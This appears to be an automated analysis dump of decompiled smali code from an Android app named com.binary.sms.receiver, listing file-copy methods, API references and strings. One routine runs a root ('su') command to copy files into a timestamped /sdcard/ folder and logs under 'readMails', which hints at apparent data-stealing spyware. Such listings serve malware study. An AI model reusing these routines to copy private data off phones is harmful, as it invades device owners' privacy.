    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.list
    • java.io.File.<init>
    • java.io.File.<init>
    • com.binary.sms.receiver.SkeletonActivity.copyFiles
    • com.binary.sms.receiver.SkeletonActivity.copyFile
    Strings
    • copy files
    • copyFiles: Can not find source:
    • .
    • copyFiles:
    • copyFiles: No right to source:
    • copyFiles: Could not create direcotry:
    • copy dir src:
    • copy dir des:
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/lang/Exception;
    5}
    6.end annotation
    7.prologue
    8try_start_0:
    9const-string v5, "copy files"
    11invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    13invoke-virtual {p0}, Ljava/io/File;->exists()Z
    14move-result v5
    15if-nez v5, :cond_42
    16new-instance v5, Ljava/io/IOException;
    17new-instance v6, Ljava/lang/StringBuilder;
    19const-string v7, "copyFiles: Can not find source: "
    21invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    23invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    24move-result-object v7
    26invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    27move-result-object v6
    29const-string v7, "."
    31invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    32move-result-object v6
    34invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    35move-result-object v6
    37invoke-direct {v5, v6}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    38throw v5
    39catch_2a: move-exception v1
    40new-instance v5, Ljava/lang/StringBuilder;
    42const-string v6, "copyFiles: "
    44invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    47move-result-object v6
    49invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    50move-result-object v5
    52invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    53move-result-object v5
    55invoke-static {v5, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    56goto_41: return-void
    57cond_42:
    58invoke-virtual {p0}, Ljava/io/File;->canRead()Z
    59move-result v5
    60if-nez v5, :cond_67
    61new-instance v5, Ljava/io/IOException;
    62new-instance v6, Ljava/lang/StringBuilder;
    64const-string v7, "copyFiles: No right to source: "
    66invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    68invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    69move-result-object v7
    71invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    72move-result-object v6
    74const-string v7, "."
    76invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    77move-result-object v6
    79invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    80move-result-object v6
    82invoke-direct {v5, v6}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    83throw v5
    84cond_67:
    85invoke-virtual {p0}, Ljava/io/File;->isDirectory()Z
    86move-result v5
    87if-eqz v5, :cond_e0
    89invoke-virtual {p1}, Ljava/io/File;->exists()Z
    90move-result v5
    91if-nez v5, :cond_c4
    93invoke-virtual {p1}, Ljava/io/File;->mkdirs()Z
    94move-result v5
    95if-nez v5, :cond_98
    96new-instance v5, Ljava/io/IOException;
    97new-instance v6, Ljava/lang/StringBuilder;
    99const-string v7, "copyFiles: Could not create direcotry: "
    101invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    103invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    104move-result-object v7
    106invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    107move-result-object v6
    109const-string v7, "."
    111invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    112move-result-object v6
    114invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    115move-result-object v6
    117invoke-direct {v5, v6}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    118throw v5
    119cond_98: new-instance v5, Ljava/lang/StringBuilder;
    121const-string v6, "copy dir src: "
    123invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    125invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    126move-result-object v6
    128invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    129move-result-object v5
    131invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    132move-result-object v5
    134invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    135new-instance v5, Ljava/lang/StringBuilder;
    137const-string v6, "copy dir des: "
    139invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    141invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    142move-result-object v6
    144invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    145move-result-object v5
    147invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    148move-result-object v5
    150invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    151cond_c4:
    152invoke-virtual {p0}, Ljava/io/File;->list()[Ljava/lang/String;
    153move-result-object v3
    154const/4 v2, 0x0
    155goto_c9: array-length v5, v3
    156if-ge v2, v5, :cond_41
    157new-instance v0, Ljava/io/File;
    158aget-object v5, v3, v2
    160invoke-direct {v0, p1, v5}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
    161new-instance v4, Ljava/io/File;
    162aget-object v5, v3, v2
    164invoke-direct {v4, p0, v5}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
    166invoke-static {v4, v0}, Lcom/binary/sms/receiver/SkeletonActivity;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    167add-int/lit8 v2, v2, 0x1
    168goto/16 :goto_c9
    169cond_e0:
    170invoke-static {p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity;->copyFile(Ljava/io/File;Ljava/io/File;)V
    171try_end_e3: goto/16 :goto_41
    Cross References
    APIs
    • java.io.FileInputStream.<init>
    • java.io.FileOutputStream.<init>
    • java.io.FileInputStream.read
    • java.io.FileInputStream.close
    • java.io.FileOutputStream.close
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.FileOutputStream.write
    • java.lang.StringBuilder.<init>
    • java.io.IOException.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.io.IOException.initCause
    • java.io.IOException.getStackTrace
    • java.io.IOException.setStackTrace
    • java.io.FileInputStream.close
    • java.io.FileOutputStream.close
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • copy file src:
    • copy file des:
    • copyFile:
    • copyFiles: Unable to copy file:
    • to
    • .
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/io/IOException;
    5}
    6.end annotation
    7.prologue
    8const/4 v3, 0x0
    9const/4 v5, 0x0
    10const/16 v8, 0x1000
    11new-array v0, v8, [B
    12try_start_6: new-instance v4, Ljava/io/FileInputStream;
    14invoke-direct {v4, p0}, Ljava/io/FileInputStream;-><init>(Ljava/io/File;)V
    15try_start_b: new-instance v6, Ljava/io/FileOutputStream;
    17invoke-direct {v6, p1}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
    18try_end_10:
    19invoke-virtual {v4, v0}, Ljava/io/FileInputStream;->read([B)I
    20try_end_13: move-result v1
    21if-gez v1, :cond_4d
    22if-eqz v4, :cond_1b
    24invoke-virtual {v4}, Ljava/io/FileInputStream;->close()V
    25cond_1b: if-eqz v6, :cond_20
    27invoke-virtual {v6}, Ljava/io/FileOutputStream;->close()V
    28cond_20: new-instance v8, Ljava/lang/StringBuilder;
    30const-string v9, "copy file src: "
    32invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    34invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    35move-result-object v9
    37invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    38move-result-object v8
    40invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    41move-result-object v8
    43invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    44new-instance v8, Ljava/lang/StringBuilder;
    46const-string v9, "copy file des: "
    48invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    50invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    51move-result-object v9
    53invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    54move-result-object v8
    56invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    57move-result-object v8
    59invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    60return-void
    61cond_4d: const/4 v8, 0x0
    62try_start_4e:
    63invoke-virtual {v6, v0, v8, v1}, Ljava/io/FileOutputStream;->write([BII)V
    64try_end_51: goto/16 :goto_10
    65catch_52: move-exception v2
    66move-object v5, v6
    67move-object v3, v4
    68goto_55: new-instance v8, Ljava/lang/StringBuilder;
    70const-string v9, "copyFile: "
    72invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    74invoke-virtual {v2}, Ljava/io/IOException;->getMessage()Ljava/lang/String;
    75move-result-object v9
    77invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    78move-result-object v8
    80invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    81move-result-object v8
    83invoke-static {v8, v2}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    84new-instance v7, Ljava/io/IOException;
    85new-instance v8, Ljava/lang/StringBuilder;
    87const-string v9, "copyFiles: Unable to copy file: "
    89invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    91invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    92move-result-object v9
    94invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    95move-result-object v8
    97const-string v9, "to"
    99invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    100move-result-object v8
    102invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    103move-result-object v9
    105invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    106move-result-object v8
    108const-string v9, "."
    110invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    111move-result-object v8
    113invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    114move-result-object v8
    116invoke-direct {v7, v8}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    118invoke-virtual {v7, v2}, Ljava/io/IOException;->initCause(Ljava/lang/Throwable;)Ljava/lang/Throwable;
    120invoke-virtual {v2}, Ljava/io/IOException;->getStackTrace()[Ljava/lang/StackTraceElement;
    121move-result-object v8
    123invoke-virtual {v7, v8}, Ljava/io/IOException;->setStackTrace([Ljava/lang/StackTraceElement;)V
    124throw v7
    125try_end_a2: move-exception v8
    126goto_a3: if-eqz v3, :cond_a8
    128invoke-virtual {v3}, Ljava/io/FileInputStream;->close()V
    129cond_a8: if-eqz v5, :cond_ad
    131invoke-virtual {v5}, Ljava/io/FileOutputStream;->close()V
    132cond_ad: new-instance v9, Ljava/lang/StringBuilder;
    134const-string v10, "copy file src: "
    136invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    138invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    139move-result-object v10
    141invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    142move-result-object v9
    144invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    145move-result-object v9
    147invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    148new-instance v9, Ljava/lang/StringBuilder;
    150const-string v10, "copy file des: "
    152invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    154invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    155move-result-object v10
    157invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    158move-result-object v9
    160invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    161move-result-object v9
    163invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    164throw v8
    165catchall_da: move-exception v8
    166move-object v3, v4
    167goto/16 :goto_a3
    168catchall_dd: move-exception v8
    169move-object v5, v6
    170move-object v3, v4
    171goto/16 :goto_a3
    172catch_e1: move-exception v2
    173goto/16 :goto_55
    174catch_e4: move-exception v2
    175move-object v3, v4
    176goto/16 :goto_55
    Cross References
    APIs
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.canRead
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.io.File.isDirectory
    • java.io.File.list
    • java.io.File.<init>
    • java.io.File.<init>
    Strings
    • copy files
    • copyFiles: Can not find source:
    • .
    • copyFiles:
    • copyFiles: No right to source:
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/lang/Exception;
    5}
    6.end annotation
    7.prologue
    8try_start_0:
    9const-string v5, "copy files"
    11invoke-static {v5}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    13invoke-virtual {p0}, Ljava/io/File;->exists()Z
    14move-result v5
    15if-nez v5, :cond_42
    16new-instance v5, Ljava/io/IOException;
    17new-instance v6, Ljava/lang/StringBuilder;
    19const-string v7, "copyFiles: Can not find source: "
    21invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    23invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    24move-result-object v7
    26invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    27move-result-object v6
    29const-string v7, "."
    31invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    32move-result-object v6
    34invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    35move-result-object v6
    37invoke-direct {v5, v6}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    38throw v5
    39catch_2a: move-exception v1
    40new-instance v5, Ljava/lang/StringBuilder;
    42const-string v6, "copyFiles: "
    44invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v1}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    47move-result-object v6
    49invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    50move-result-object v5
    52invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    53move-result-object v5
    55invoke-static {v5, v1}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    56goto_41: return-void
    57cond_42:
    58invoke-virtual {p0}, Ljava/io/File;->canRead()Z
    59move-result v5
    60if-nez v5, :cond_67
    61new-instance v5, Ljava/io/IOException;
    62new-instance v6, Ljava/lang/StringBuilder;
    64const-string v7, "copyFiles: No right to source: "
    66invoke-direct {v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    68invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    69move-result-object v7
    71invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    72move-result-object v6
    74const-string v7, "."
    76invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    77move-result-object v6
    79invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    80move-result-object v6
    82invoke-direct {v5, v6}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    83throw v5
    84cond_67:
    85invoke-virtual {p0}, Ljava/io/File;->isDirectory()Z
    86move-result v5
    87if-eqz v5, :cond_8c
    89invoke-static {p0, p1}, Lcom/binary/sms/receiver/SystemUtils;->copyDir(Ljava/io/File;Ljava/io/File;)V
    91invoke-virtual {p0}, Ljava/io/File;->list()[Ljava/lang/String;
    92move-result-object v3
    93const/4 v2, 0x0
    94goto_75: array-length v5, v3
    95if-ge v2, v5, :cond_41
    96new-instance v0, Ljava/io/File;
    97aget-object v5, v3, v2
    99invoke-direct {v0, p1, v5}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
    100new-instance v4, Ljava/io/File;
    101aget-object v5, v3, v2
    103invoke-direct {v4, p0, v5}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
    105invoke-static {v4, v0}, Lcom/binary/sms/receiver/SystemUtils;->copyFiles(Ljava/io/File;Ljava/io/File;)V
    106add-int/lit8 v2, v2, 0x1
    107goto/16 :goto_75
    108cond_8c:
    109invoke-static {p0, p1}, Lcom/binary/sms/receiver/SystemUtils;->copyFile(Ljava/io/File;Ljava/io/File;)V
    110try_end_8f: goto/16 :goto_41
    APIs
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.<init>
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.System.currentTimeMillis
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • copyOneByOne:
    • file not exist:
    • /sdcard/
    • /
    • copyOneByOne end:
    • readMails:
    Position Instruction Meta Information
    0.prologue
    1try_start_0: new-instance v2, Ljava/lang/StringBuilder;
    3const-string v3, "copyOneByOne: "
    5invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    7iget-object v3, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$suComand:Ljava/lang/String;
    9invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    10move-result-object v2
    12invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    13move-result-object v2
    15invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    16new-instance v1, Ljava/io/File;
    18iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$source:Ljava/lang/String;
    20invoke-direct {v1, v2}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    22invoke-virtual {v1}, Ljava/io/File;->exists()Z
    23move-result v2
    24if-nez v2, :cond_37
    25new-instance v2, Ljava/lang/StringBuilder;
    27const-string v3, "file not exist: "
    29invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    31invoke-virtual {v1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    32move-result-object v3
    34invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    35move-result-object v2
    37invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    38move-result-object v2
    40invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    41cond_37: new-instance v2, Ljava/lang/StringBuilder;
    43const-string v3, "/sdcard/"
    45invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    47invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    48move-result-wide v3
    50invoke-virtual {v2, v3, v4}, Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
    51move-result-object v2
    53const-string v3, "/"
    55invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    56move-result-object v2
    58invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    59move-result-object v2
    61invoke-virtual {p0, v1, v2}, Lcom/binary/sms/receiver/SkeletonActivity$7;->chmodOneCommand(Ljava/io/File;Ljava/lang/String;)V
    62new-instance v2, Ljava/lang/StringBuilder;
    64const-string v3, "copyOneByOne end: "
    66invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    68iget-object v3, p0, Lcom/binary/sms/receiver/SkeletonActivity$7;->val$suComand:Ljava/lang/String;
    70invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    71move-result-object v2
    73invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    74move-result-object v2
    76invoke-static {v2}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    77goto_67: return-void
    78catch_68: move-exception v0
    79new-instance v2, Ljava/lang/StringBuilder;
    81const-string v3, "readMails: "
    83invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    85invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    86move-result-object v3
    88invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    89move-result-object v2
    91invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    92move-result-object v2
    94invoke-static {v2, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    95goto/16 :goto_67
    APIs
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.canRead
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.io.File.isDirectory
    Strings
    • copyFilesNotRecursive
    • copyFiles: Can not find source:
    • .
    • copyFiles:
    • copyFiles: No right to source:
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/lang/Exception;
    5}
    6.end annotation
    7.prologue
    8try_start_0:
    9const-string v1, "copyFilesNotRecursive"
    11invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    13invoke-virtual {p0}, Ljava/io/File;->exists()Z
    14move-result v1
    15if-nez v1, :cond_42
    16new-instance v1, Ljava/io/IOException;
    17new-instance v2, Ljava/lang/StringBuilder;
    19const-string v3, "copyFiles: Can not find source: "
    21invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    23invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    24move-result-object v3
    26invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    27move-result-object v2
    29const-string v3, "."
    31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    32move-result-object v2
    34invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    35move-result-object v2
    37invoke-direct {v1, v2}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    38throw v1
    39catch_2a: move-exception v0
    40new-instance v1, Ljava/lang/StringBuilder;
    42const-string v2, "copyFiles: "
    44invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    46invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    47move-result-object v2
    49invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    50move-result-object v1
    52invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    53move-result-object v1
    55invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    56goto_41: return-void
    57cond_42:
    58invoke-virtual {p0}, Ljava/io/File;->canRead()Z
    59move-result v1
    60if-nez v1, :cond_67
    61new-instance v1, Ljava/io/IOException;
    62new-instance v2, Ljava/lang/StringBuilder;
    64const-string v3, "copyFiles: No right to source: "
    66invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    68invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    69move-result-object v3
    71invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    72move-result-object v2
    74const-string v3, "."
    76invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    77move-result-object v2
    79invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    80move-result-object v2
    82invoke-direct {v1, v2}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    83throw v1
    84cond_67:
    85invoke-virtual {p0}, Ljava/io/File;->isDirectory()Z
    86move-result v1
    87if-eqz v1, :cond_71
    89invoke-static {p0, p1}, Lcom/binary/sms/receiver/SystemUtils;->copyDir(Ljava/io/File;Ljava/io/File;)V
    90goto/16 :goto_41
    91cond_71:
    92invoke-static {p0, p1}, Lcom/binary/sms/receiver/SystemUtils;->copyFile(Ljava/io/File;Ljava/io/File;)V
    93try_end_74: goto/16 :goto_41
    APIs
    • android.app.Activity.onCreate
    • com.binary.sms.receiver.SkeletonActivity.setContentView
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.mClearListener:Landroid/view/View$OnClickListener
    • android.widget.Button.setOnClickListener
    • com.binary.sms.receiver.SkeletonActivity.mEditor:Landroid/widget/EditText
    • com.binary.sms.receiver.SkeletonActivity.mEditor:Landroid/widget/EditText
    • android.widget.EditText.setText
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.findViewById
    • com.binary.sms.receiver.SkeletonActivity.btnContacts:Landroid/widget/Button
